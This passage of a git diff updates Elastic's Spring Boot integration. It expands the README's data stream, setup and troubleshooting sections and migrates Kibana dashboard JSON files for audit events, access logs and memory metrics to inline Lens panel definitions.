help you keep a record of events that occur on your machine. The Log data streams collected by Spring Boot integration are `auditevents` and `httptrace`, allowing users to track authentication events, HTTP request and response details, enabling comprehensive monitoring and security auditing. + +Metrics provide insight into the statistics of Spring Boot. The Metrics data streams collected by the Spring Boot integration include auditevents, gc, httptrace, memory, and threading, enabling users to monitor and troubleshoot the performance of Spring Boot instances. + +Data streams: +- `auditevents`: Collects information related to the authentication status, remote address, document ID and principal. +- `gc`: Collects information related to the GC collector name, memory usage before and after collection, thread count, and time metrics. +- `httptrace`: Collects information related to the http requests, status response, principal and session details. +- `memory`: Collects information related to the heap and non-heap memory, buffer pool and manager. +- `threading`: Collects information related to the thread allocations, monitoring and CPU times. + +Note: +- Users can monitor and view the logs inside the ingested documents for Spring Boot in the `logs-*` index pattern from `Discover`, while for metrics, the index pattern is `metrics-*`. + ## Compatibility This integration has been tested against Spring Boot v2.7.17 with LTS JDK versions 8, 11, 17, and 21. ## Requirements +You need Elasticsearch for storing and searching your data and Kibana for visualizing and managing it. You can use our hosted Elasticsearch Service on Elastic Cloud, which is recommended or self-manage the Elastic Stack on your own hardware. + In order to ingest data from Spring Boot: - You must know the host for Spring Boot application, add that host while configuring the integration package. - Add default path for jolokia. -- Spring-boot-actuator module provides all Spring Boot’s production-ready features. So add below dependency in `pom.xml` file. +- Spring-boot-actuator module provides all Spring Boot's production-ready features. You also need to add the following dependency to the `pom.xml` file: ``` org.springframework.boot @@ -28,11 +56,19 @@ In order to ingest data from Spring Boot: - To expose `HTTP Trace` metrics following class can be used [InMemoryHttpTraceRepository](https://docs.spring.io/spring-boot/docs/2.0.6.RELEASE/api/org/springframework/boot/actuate/trace/http/InMemoryHttpTraceRepository.html). - To expose `Audit Events` metrics following class can be used [InMemoryAuditEventRepository](https://docs.spring.io/spring-boot/docs/current/api/org/springframework/boot/actuate/audit/InMemoryAuditEventRepository.html). -### Troubleshooting +## Setup + +For step-by-step instructions on how to set up an integration, see the [Getting Started](https://www.elastic.co/guide/en/welcome-to-elastic/current/getting-started-observability.html) guide. + +## Validation + +After the integration is successfully configured, click on the *Assets* tab of the Spring Boot Integration to display the available dashboards. Select the dashboard for your configured data stream, which should be populated with the required data. + +## Troubleshooting -- If **[Spring Boot] Audit Events panel** does not display older documents after upgrading to ``0.9.0`` or later versions, then this issue can be solved by reindexing the ``Audit Events`` data stream's indices. -- If host.ip is shown conflicted under ``logs-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Audit Events`` data stream's indices. -- If host.ip is shown conflicted under ``metrics-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Garbage Collector``, ``Memory`` and ``Threading`` data stream's indices. +- If **[Spring Boot] Audit Events panel** does not display older documents after upgrading to ``0.9.0`` or later versions, this issue can be resolved by reindexing the ``Audit Events`` data stream. +- If `host.ip` appears conflicted under the ``logs-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Audit Events`` data stream. +- If `host.ip` appears conflicted under the ``metrics-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Garbage Collector``, ``Memory`` and ``Threading`` data stream. ## Logs diff --git a/packages/spring_boot/kibana/dashboard/spring_boot-6fe11330-c7f1-11ec-986a-f1e84447fd00.json b/packages/spring_boot/kibana/dashboard/spring_boot-6fe11330-c7f1-11ec-986a-f1e84447fd00.json index 17749eba1d1..80518abebe0 100644 --- a/packages/spring_boot/kibana/dashboard/spring_boot-6fe11330-c7f1-11ec-986a-f1e84447fd00.json +++ b/packages/spring_boot/kibana/dashboard/spring_boot-6fe11330-c7f1-11ec-986a-f1e84447fd00.json @@ -1,77 +1,437 @@ { - "attributes": { - "description": "Audit events of the Spring Boot system.", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" + "id": "spring_boot-6fe11330-c7f1-11ec-986a-f1e84447fd00", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.7.0" + }, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.7.0", + "updated_at": "2024-01-03T20:12:28.833Z", + "created_at": "2024-01-03T20:12:28.833Z", + "version": "Wzk5LDFd", + "attributes": { + "description": "Audit events of the Spring Boot system.", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "description": "", + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "41dbf555-e40a-45dc-83d7-18b18263e8de": { + "columnOrder": [ + "3624c7a7-411d-4138-9fdf-8b8a0694d285", + "769bee1d-5cdf-49f1-9fa3-53ce8f2388c8", + "a84b9b2d-8712-4975-a242-7996161a71da", + "5209c821-5ae2-40d6-b2c5-321b76c96ebc", + "52932019-4385-469b-9f4d-6becd3a912f6", + "5c3ff6ac-16ca-4b9b-912d-a47e7c7d7081" + ], + "columns": { + "3624c7a7-411d-4138-9fdf-8b8a0694d285": { + "dataType": "string", + "isBucketed": true, + "label": "Top 100 values of spring_boot.audit_events.document_id", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" + }, + "orderDirection": "asc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 100 + }, + "scale": "ordinal", + "sourceField": "spring_boot.audit_events.document_id" + }, + "5209c821-5ae2-40d6-b2c5-321b76c96ebc": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Host", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "spring_boot.audit_events.data.remote_address" + }, + "52932019-4385-469b-9f4d-6becd3a912f6": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Session ID", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "spring_boot.audit_events.data.session_id" + }, + "5c3ff6ac-16ca-4b9b-912d-a47e7c7d7081": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Authentication type", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "spring_boot.audit_events.type" + }, + "769bee1d-5cdf-49f1-9fa3-53ce8f2388c8": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": false, + "interval": "1s" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "a84b9b2d-8712-4975-a242-7996161a71da": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Principal", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "spring_boot.audit_events.principal" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "96d564d4-65af-4ed2-a3f6-0af7787d4b01", + "key": "event.dataset", + "negate": false, + "params": { + "query": "spring_boot.audit_events" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "spring_boot.audit_events" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "alignment": "center", + "columnId": "a84b9b2d-8712-4975-a242-7996161a71da", + "hidden": false, + "isTransposed": false, + "width": 166 + }, + { + "alignment": "center", + "columnId": "5209c821-5ae2-40d6-b2c5-321b76c96ebc", + "isTransposed": false, + "width": 183.41666666666669 + }, + { + "alignment": "center", + "columnId": "5c3ff6ac-16ca-4b9b-912d-a47e7c7d7081", + "isTransposed": false, + "width": 296.41666666666674 + }, + { + "alignment": "center", + "columnId": "3624c7a7-411d-4138-9fdf-8b8a0694d285", + "hidden": true, + "isTransposed": false + }, + { + "alignment": "center", + "columnId": "769bee1d-5cdf-49f1-9fa3-53ce8f2388c8", + "isTransposed": false, + "width": 128.16666666666652 + }, + { + "alignment": "center", + "columnId": "52932019-4385-469b-9f4d-6becd3a912f6", + "isTransposed": false + } + ], + "fitRowToContent": true, + "layerId": "41dbf555-e40a-45dc-83d7-18b18263e8de", + "layerType": "data", + "paging": { + "enabled": true, + "size": 10 + }, + "rowHeight": "auto", + "rowHeightLines": 2, + "sorting": { + "columnId": "769bee1d-5cdf-49f1-9fa3-53ce8f2388c8", + "direction": "desc" } - } + } + }, + "title": "Audit Events [Logs Spring Boot]", + "visualizationType": "lnsDatatable", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-41dbf555-e40a-45dc-83d7-18b18263e8de", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "96d564d4-65af-4ed2-a3f6-0af7787d4b01", + "type": "index-pattern" + } + ] + } }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true + "gridData": { + "h": 16, + "i": "e3c09d50-2585-4fdf-90bd-1b1a837edf6a", + "w": 32, + "x": 0, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 16, - "i": "e3c09d50-2585-4fdf-90bd-1b1a837edf6a", - "w": 32, - "x": 0, - "y": 0 - }, - "panelIndex": "e3c09d50-2585-4fdf-90bd-1b1a837edf6a", - "panelRefName": "panel_e3c09d50-2585-4fdf-90bd-1b1a837edf6a", - "type": "lens", - "version": "8.1.0" + "panelIndex": "e3c09d50-2585-4fdf-90bd-1b1a837edf6a", + "type": "lens", + "version": "8.6.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "73272b0b-e1d4-4a44-9904-adaad0d24159": { + "columnOrder": [ + "2fe1f301-207a-48ff-aa1c-13aaed31b9db", + "1b8c4683-1d76-49cc-95c8-691612657847" + ], + "columns": { + "1b8c4683-1d76-49cc-95c8-691612657847": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 2 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "2fe1f301-207a-48ff-aa1c-13aaed31b9db": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Authentication Type", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "1b8c4683-1d76-49cc-95c8-691612657847", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "spring_boot.audit_events.type" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "b7a7b7d1-61be-48a9-9158-7f778b4ddaf2", + "key": "event.dataset", + "negate": false, + "params": { + "query": "spring_boot.audit_events" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "spring_boot.audit_events" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "73272b0b-e1d4-4a44-9904-adaad0d24159", + "layerType": "data", + "legendDisplay": "show", + "legendMaxLines": 1, + "legendPosition": "bottom", + "nestedLegend": true, + "numberDisplay": "percent", + "truncateLegend": true, + "legendSize": "auto", + "primaryGroups": [ + "2fe1f301-207a-48ff-aa1c-13aaed31b9db" + ], + "metrics": [ + "1b8c4683-1d76-49cc-95c8-691612657847" + ] + } + ], + "shape": "pie" + } }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 16, - "i": "33cab98f-7c8f-4d79-ad28-f2a0e7113b46", - "w": 16, - "x": 32, - "y": 0 - }, - "panelIndex": "33cab98f-7c8f-4d79-ad28-f2a0e7113b46", - "panelRefName": "panel_33cab98f-7c8f-4d79-ad28-f2a0e7113b46", - "type": "lens", - "version": "8.1.0" - } - ], - "timeRestore": false, - "title": "[Spring Boot] Audit Events", - "version": 1 - }, - "coreMigrationVersion": "8.2.0", - "id": "spring_boot-6fe11330-c7f1-11ec-986a-f1e84447fd00", - "migrationVersion": { - "dashboard": "8.2.0" - }, - "references": [ - { - "id": "spring_boot-a41702e0-c7f1-11ec-986a-f1e84447fd00", - "name": "e3c09d50-2585-4fdf-90bd-1b1a837edf6a:panel_e3c09d50-2585-4fdf-90bd-1b1a837edf6a", - "type": "lens" + "title": "Authentication type [Logs Spring Boot]", + "visualizationType": "lnsPie", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-73272b0b-e1d4-4a44-9904-adaad0d24159", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b7a7b7d1-61be-48a9-9158-7f778b4ddaf2", + "type": "index-pattern" + } + ] + } }, - { - "id": "spring_boot-aa0c95c0-c7f1-11ec-986a-f1e84447fd00", - "name": "33cab98f-7c8f-4d79-ad28-f2a0e7113b46:panel_33cab98f-7c8f-4d79-ad28-f2a0e7113b46", - "type": "lens" - } + "gridData": { + "h": 16, + "i": "33cab98f-7c8f-4d79-ad28-f2a0e7113b46", + "w": 16, + "x": 32, + "y": 0 + }, + "panelIndex": "33cab98f-7c8f-4d79-ad28-f2a0e7113b46", + "type": "lens", + "version": "8.6.0" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Spring Boot] Audit Events", + "version": 1 + }, + "references": [ + { + "type": "index-pattern", + "name": "e3c09d50-2585-4fdf-90bd-1b1a837edf6a:indexpattern-datasource-current-indexpattern", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "e3c09d50-2585-4fdf-90bd-1b1a837edf6a:indexpattern-datasource-layer-41dbf555-e40a-45dc-83d7-18b18263e8de", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "e3c09d50-2585-4fdf-90bd-1b1a837edf6a:96d564d4-65af-4ed2-a3f6-0af7787d4b01", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "33cab98f-7c8f-4d79-ad28-f2a0e7113b46:indexpattern-datasource-current-indexpattern", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "33cab98f-7c8f-4d79-ad28-f2a0e7113b46:indexpattern-datasource-layer-73272b0b-e1d4-4a44-9904-adaad0d24159", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "33cab98f-7c8f-4d79-ad28-f2a0e7113b46:b7a7b7d1-61be-48a9-9158-7f778b4ddaf2", + "id": "logs-*" + } + ], + "managed": false } \ No newline at end of file diff --git a/packages/spring_boot/kibana/dashboard/spring_boot-6fe782d0-ca15-11ec-b4b1-b57f75afa7dd.json b/packages/spring_boot/kibana/dashboard/spring_boot-6fe782d0-ca15-11ec-b4b1-b57f75afa7dd.json index 982926ceb49..8011aaad857 100644 --- a/packages/spring_boot/kibana/dashboard/spring_boot-6fe782d0-ca15-11ec-b4b1-b57f75afa7dd.json +++ b/packages/spring_boot/kibana/dashboard/spring_boot-6fe782d0-ca15-11ec-b4b1-b57f75afa7dd.json @@ -1,78 +1,380 @@ { - "attributes": { - "description": "Access logs dashboard of Spring Boot application.", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" + "id": "spring_boot-6fe782d0-ca15-11ec-b4b1-b57f75afa7dd", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.7.0" + }, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.7.0", + "updated_at": "2024-01-03T20:12:28.833Z", + "created_at": "2024-01-03T20:12:28.833Z", + "version": "WzEwMCwxXQ==", + "attributes": { + "description": "Access logs dashboard of Spring Boot application.", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "12461a5e-412f-4380-9b8a-d4dfe0fa20bc": { + "columnOrder": [ + "59a904ae-9fcd-4d06-b201-09117b1981d6", + "9a043bf0-329d-4632-a095-86760550bd75" + ], + "columns": { + "59a904ae-9fcd-4d06-b201-09117b1981d6": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of http.request.method", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "9a043bf0-329d-4632-a095-86760550bd75", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "http.request.method" + }, + "9a043bf0-329d-4632-a095-86760550bd75": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {} + } + } } - } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "76ee3705-3872-45f3-8cbf-f0595d97905d", + "key": "event.dataset", + "negate": false, + "params": { + "query": "spring_boot.http_trace" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "spring_boot.http_trace" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "12461a5e-412f-4380-9b8a-d4dfe0fa20bc", + "layerType": "data", + "legendDisplay": "show", + "nestedLegend": true, + "numberDisplay": "percent", + "legendSize": "auto", + "primaryGroups": [ + "59a904ae-9fcd-4d06-b201-09117b1981d6" + ], + "metrics": [ + "9a043bf0-329d-4632-a095-86760550bd75" + ] + } + ], + "shape": "pie" + } + }, + "title": "HTTP Request method types [Metrics Spring Boot]", + "visualizationType": "lnsPie", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-12461a5e-412f-4380-9b8a-d4dfe0fa20bc", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "76ee3705-3872-45f3-8cbf-f0595d97905d", + "type": "index-pattern" + } + ] + } }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true + "gridData": { + "h": 13, + "i": "d008cb2e-26ec-4035-a79e-fd58d8b99b6c", + "w": 16, + "x": 0, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false + "panelIndex": "d008cb2e-26ec-4035-a79e-fd58d8b99b6c", + "title": "HTTP Request method types [Logs Spring Boot]", + "type": "lens", + "version": "8.6.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "12461a5e-412f-4380-9b8a-d4dfe0fa20bc": { + "columnOrder": [ + "2dbf54bf-2147-4302-902b-a176ae9df338", + "21757728-2591-42a8-bed5-10cc5c097d85", + "9a043bf0-329d-4632-a095-86760550bd75" + ], + "columns": { + "21757728-2591-42a8-bed5-10cc5c097d85": { + "dataType": "number", + "isBucketed": true, + "label": "http.response.status_code", + "operationType": "range", + "params": { + "maxBars": "auto", + "ranges": [ + { + "from": 0, + "label": "", + "to": 1000 + } + ], + "type": "histogram" + }, + "scale": "interval", + "sourceField": "http.response.status_code" + }, + "2dbf54bf-2147-4302-902b-a176ae9df338": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "1m" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "9a043bf0-329d-4632-a095-86760550bd75": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "ba5b5f52-398a-48c9-8021-520aa78ccdba", + "key": "event.dataset", + "negate": false, + "params": { + "query": "spring_boot.http_trace" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "spring_boot.http_trace" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 13, - "i": "d008cb2e-26ec-4035-a79e-fd58d8b99b6c", - "w": 16, - "x": 0, - "y": 0 + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "d008cb2e-26ec-4035-a79e-fd58d8b99b6c", - "panelRefName": "panel_d008cb2e-26ec-4035-a79e-fd58d8b99b6c", - "title": "HTTP Request method types [Logs Spring Boot]", - "type": "lens", - "version": "8.1.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "gridData": { - "h": 13, - "i": "86f18b62-ecd7-48fa-8459-896739b71ce6", - "w": 32, - "x": 16, - "y": 0 + "layers": [ + { + "accessors": [ + "9a043bf0-329d-4632-a095-86760550bd75" + ], + "layerId": "12461a5e-412f-4380-9b8a-d4dfe0fa20bc", + "layerType": "data", + "position": "top", + "seriesType": "bar", + "showGridlines": false, + "splitAccessor": "21757728-2591-42a8-bed5-10cc5c097d85", + "xAccessor": "2dbf54bf-2147-4302-902b-a176ae9df338" + } + ], + "legend": { + "horizontalAlignment": "right", + "isInside": false, + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": false, + "showSingleSeries": false, + "verticalAlignment": "top", + "legendSize": "auto" }, - "panelIndex": "86f18b62-ecd7-48fa-8459-896739b71ce6", - "panelRefName": "panel_86f18b62-ecd7-48fa-8459-896739b71ce6", - "type": "lens", - "version": "8.1.0" - } - ], - "timeRestore": false, - "title": "[Spring Boot] Access logs", - "version": 1 - }, - "coreMigrationVersion": "8.2.0", - "id": "spring_boot-6fe782d0-ca15-11ec-b4b1-b57f75afa7dd", - "migrationVersion": { - "dashboard": "8.2.0" - }, - "references": [ - { - "id": "spring_boot-a676b6b0-ca13-11ec-b4b1-b57f75afa7dd", - "name": "d008cb2e-26ec-4035-a79e-fd58d8b99b6c:panel_d008cb2e-26ec-4035-a79e-fd58d8b99b6c", - "type": "lens" + "preferredSeriesType": "bar", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "HTTP Request status code [Logs Spring Boot]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-12461a5e-412f-4380-9b8a-d4dfe0fa20bc", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ba5b5f52-398a-48c9-8021-520aa78ccdba", + "type": "index-pattern" + } + ] + } }, - { - "id": "spring_boot-5240dfb0-ca15-11ec-b4b1-b57f75afa7dd", - "name": "86f18b62-ecd7-48fa-8459-896739b71ce6:panel_86f18b62-ecd7-48fa-8459-896739b71ce6", - "type": "lens" - } + "gridData": { + "h": 13, + "i": "86f18b62-ecd7-48fa-8459-896739b71ce6", + "w": 32, + "x": 16, + "y": 0 + }, + "panelIndex": "86f18b62-ecd7-48fa-8459-896739b71ce6", + "type": "lens", + "version": "8.6.0" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Spring Boot] Access logs", + "version": 1 + }, + "references": [ + { + "type": "index-pattern", + "name": "d008cb2e-26ec-4035-a79e-fd58d8b99b6c:indexpattern-datasource-current-indexpattern", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "d008cb2e-26ec-4035-a79e-fd58d8b99b6c:indexpattern-datasource-layer-12461a5e-412f-4380-9b8a-d4dfe0fa20bc", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "d008cb2e-26ec-4035-a79e-fd58d8b99b6c:76ee3705-3872-45f3-8cbf-f0595d97905d", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "86f18b62-ecd7-48fa-8459-896739b71ce6:indexpattern-datasource-current-indexpattern", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "86f18b62-ecd7-48fa-8459-896739b71ce6:indexpattern-datasource-layer-12461a5e-412f-4380-9b8a-d4dfe0fa20bc", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "86f18b62-ecd7-48fa-8459-896739b71ce6:ba5b5f52-398a-48c9-8021-520aa78ccdba", + "id": "logs-*" + } + ], + "managed": false } \ No newline at end of file diff --git a/packages/spring_boot/kibana/dashboard/spring_boot-c89e1510-ca15-11ec-b4b1-b57f75afa7dd.json b/packages/spring_boot/kibana/dashboard/spring_boot-c89e1510-ca15-11ec-b4b1-b57f75afa7dd.json index 8cb7881e227..909a74c5620 100644 --- a/packages/spring_boot/kibana/dashboard/spring_boot-c89e1510-ca15-11ec-b4b1-b57f75afa7dd.json +++ b/packages/spring_boot/kibana/dashboard/spring_boot-c89e1510-ca15-11ec-b4b1-b57f75afa7dd.json @@ -1,145 +1,1304 @@ { - "attributes": { - "description": "Metrics related to threads, heap and non heap memory.", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" + "id": "spring_boot-c89e1510-ca15-11ec-b4b1-b57f75afa7dd", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.7.0" + }, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.7.0", + "updated_at": "2024-01-03T20:12:28.833Z", + "created_at": "2024-01-03T20:12:28.833Z", + "version": "WzEwMSwxXQ==", + "attributes": { + "description": "Metrics related to threads, heap and non heap memory.", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "31ad067d-6820-43dc-a6fd-7a32a6a121f5": { + "columnOrder": [ + "ce51dd8d-7fd5-4ebf-a835-9ffe83125746", + "07747e2a-9e75-47d8-b1d4-87c0340cf60d", + "9b2297d6-8625-44a3-a7ba-633da40efcfb" + ], + "columns": { + "07747e2a-9e75-47d8-b1d4-87c0340cf60d": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Heap Used", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 0 + } + }, + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "spring_boot.memory.heap.used" + }, + "9b2297d6-8625-44a3-a7ba-633da40efcfb": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Non Heap Used", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 0 + } + }, + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "spring_boot.memory.non_heap.used" + }, + "ce51dd8d-7fd5-4ebf-a835-9ffe83125746": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "8a86b358-6960-40ef-91ed-05c2c2e7c40f", + "key": "event.dataset", + "negate": false, + "params": { + "query": "spring_boot.memory" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "spring_boot.memory" + } + } } - } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "07747e2a-9e75-47d8-b1d4-87c0340cf60d", + "9b2297d6-8625-44a3-a7ba-633da40efcfb" + ], + "layerId": "31ad067d-6820-43dc-a6fd-7a32a6a121f5", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "ce51dd8d-7fd5-4ebf-a835-9ffe83125746" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + }, + "yTitle": "Memory" + } + }, + "title": "Heap and non-heap memory [Metrics Spring Boot]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": 